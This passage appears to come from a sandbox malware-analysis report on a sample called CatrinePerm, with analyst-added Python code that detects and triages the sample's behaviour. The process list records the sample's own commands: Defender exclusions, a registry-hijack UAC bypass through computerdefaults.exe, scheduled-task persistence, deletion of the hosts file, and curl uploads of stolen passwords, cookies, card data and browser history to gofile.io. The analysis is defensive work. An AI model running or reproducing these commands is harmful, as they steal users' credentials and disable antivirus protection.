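        if ev["kind"] == "registry":
            ev["path"] = normalize_registry_path(ev["path"])
        for technique, name, predicate in RULES:
            if predicate(ev):
                findings.append({"technique": technique, "name": name,
                                 "process": ev["process"], "path": ev["path"]})
    return findings


# Events copied from the report's tables (the process-creation row is implied by
# the "Creates scheduled task(s)" table, which lists only the process).
EVENTS = [
    {"kind": "registry", "action": "Set value (str)",
     "path": r"\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update",
     "value": r"C:\Users\Admin\AppData\Roaming\Update.exe",
     "process": r"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"},
    {"kind": "file", "action": "File created",
     "path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk",
     "process": r"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"},
    {"kind": "file", "action": "File created",
     "path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe",
     "process": r"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"},
    {"kind": "registry", "action": "Key created",
     "path": r"\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command",
     "process": r"C:\Windows\SysWOW64\reg.exe"},
    {"kind": "registry", "action": "Set value (int)",
     "path": r"\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode",
     "process": r"C:\Windows\Explorer.EXE"},
    {"kind": "process", "action": "Process created", "path": "",
     "process": r"C:\Windows\SysWOW64\schtasks.exe"},
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f'{f["technique"]} {f["name"]}: {f["process"]} -> {f["path"]}')
```

On a live host the same checks are a look at HKCU\Software\Classes\ms-settings\shell\open\command (it does not exist on a clean user profile), the Run value named Update, the Startup folder contents, and the scheduled-task list, in that order of urgency.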

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (10 events)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A (2 events)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (12 events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A (21 events)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (11 events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A (4 events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A (4 events)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A (×2 rows)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×3 rows)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A (×2 rows)
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A (×2 rows)
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A (×23 rows, interleaved with the SeCreatePagefilePrivilege row below)
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A (×22 rows)

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (×44 rows)
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A (×19 rows)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (×24 rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (×40 rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 3344 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (×2 rows)
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (×40 rows)
PID 2192 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (×2 rows)
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (×20 rows)
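
The signature tables above mix three different sources: analyst activity on the VM (taskmgr.exe, 7zG.exe, Explorer), normal browser internals, and the executables running out of C:\Users\Admin\AppData\Local\Temp. Two points are worth separating when reading them. Every WriteProcessMemory row is a single msedge.exe PID (2192) writing into other msedge.exe PIDs, the pattern of a Chromium browser process setting up the renderer and utility children it has just spawned, not a write into a foreign process. SeDebugPrivilege, on the other hand, is enabled by taskmgr.exe, where it is routine, and also by WinRAR.exe, RtkBtAudioServ.exe and opwotwbz.exe from the Temp directory, where it is not. The Python below is an added example, not part of the sandbox report or its tooling: it parses rows in the two shapes used in these tables (the embedded sample is a constructed subset of the rows above) and applies that separation by image path and by same-image versus cross-image writes. The path-zone lists and the set of privileges treated as sensitive are the example's own assumptions, and path alone does not settle every case: the powershell.exe instances score as system binaries here, and whether they were the analyst's or the sample's children is a question for the process tree, not for this table.

```python
"""Triage of flattened sandbox signature rows (added example, not part of
the report): sorts analyst/browser noise from activity worth chasing."""
import re
from dataclasses import dataclass

# Constructed sample: a subset of rows copied from the signature tables above.
SAMPLE_ROWS = r"""
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
PID 2192 wrote to memory of 3344 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"""

TOKEN_ROW = re.compile(r"^Token: (\S+) N/A (.+?) N/A$")
WPM_ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+)$")
# The last WPM column holds two paths; split on the space before a drive
# letter so the spaces inside "Program Files (x86)" survive.
DRIVE_SPLIT = re.compile(r" (?=[A-Za-z]:\\)")

# Assumed zone lists. User-writable locations outrank the trusted roots: a
# payload dropped under AppData or Downloads is never classified as a system binary.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\users\\public\\")
SYSTEM_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumed set of privileges worth a look; SeShutdown, SeCreatePagefile,
# SeSystemProfile and friends are routine Explorer / Task Manager housekeeping.
SENSITIVE_PRIVS = {"SeDebugPrivilege", "SeTcbPrivilege", "SeLoadDriverPrivilege",
                   "SeImpersonatePrivilege", "SeTakeOwnershipPrivilege",
                   "SeBackupPrivilege", "SeRestorePrivilege"}


@dataclass
class Finding:
    severity: str  # "high", "info", "low" or "note"
    rule: str
    process: str
    detail: str


def path_zone(path: str) -> str:
    low = path.lower()
    if any(marker in low for marker in USER_WRITABLE):
        return "user-writable"
    return "system" if low.startswith(SYSTEM_ROOTS) else "other"


def triage_token(priv: str, proc: str) -> Finding:
    if not priv.startswith("Se"):  # sandbox printed a raw LUID it could not resolve
        return Finding("note", "privilege", proc, f"unresolved privilege LUID {priv}")
    zone = path_zone(proc)
    if priv in SENSITIVE_PRIVS and zone != "system":
        return Finding("high", "privilege", proc, f"enabled {priv} from a {zone} path")
    if priv in SENSITIVE_PRIVS:
        return Finding("info", "privilege", proc, f"enabled {priv} (system binary)")
    return Finding("low", "privilege", proc, f"enabled {priv}")


def triage_wpm(src_pid: str, dst_pid: str, src: str, dst: str) -> Finding:
    # A system binary writing into another instance of its own image is the
    # shape of a parent configuring children it just spawned (Chromium's
    # browser process does this for every renderer/utility child).
    if src.lower() == dst.lower() and path_zone(src) == "system":
        return Finding("info", "write-process-memory", src,
                       f"PID {src_pid} -> {dst_pid}: same-image write into own child")
    return Finding("high", "write-process-memory", src,
                   f"PID {src_pid} -> {dst_pid}: wrote into {dst}")


def triage(rows: str) -> list[Finding]:
    findings: list[Finding] = []
    for line in rows.splitlines():
        line = line.strip()
        if m := TOKEN_ROW.match(line):
            findings.append(triage_token(m.group(1), m.group(2)))
        elif m := WPM_ROW.match(line):
            paths = DRIVE_SPLIT.split(m.group(3))
            if len(paths) == 2:
                findings.append(triage_wpm(m.group(1), m.group(2), paths[0], paths[1]))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


if __name__ == "__main__":
    results = triage(SAMPLE_ROWS)
    for f in sorted(results, key=lambda f: f.severity != "high"):
        print(f"[{f.severity:4}] {f.rule}: {f.process} {f.detail}")
    print(summarize(results))
```

Run stand-alone it prints the findings with the high-severity rows first; on the embedded sample those are the three Temp-directory executables enabling SeDebugPrivilege, while both msedge.exe writes come out as informational. Paste the full tables in place of SAMPLE_ROWS to triage the whole report: rows that match neither shape are skipped, and the counts from summarize() show at a glance how much of a signature section is browser or analyst noise.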

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Gk67Vl.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe773146f8,0x7ffe77314708,0x7ffe77314718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4632 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2958:84:7zEvent12321

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"

C:\Users\Admin\AppData\Roaming\Win (3).exe

"C:\Users\Admin\AppData\Roaming\Win (3).exe"

C:\Users\Admin\AppData\Roaming\CatrinePerm.exe

"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WinRAR.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs" /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C computerdefaults.exe

C:\Windows\SysWOW64\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT

C:\Windows\SysWOW64\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"

C:\Users\Admin\AppData\Roaming\Win (3).exe

"C:\Users\Admin\AppData\Roaming\Win (3).exe"

C:\Users\Admin\AppData\Roaming\CatrinePerm.exe

"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile

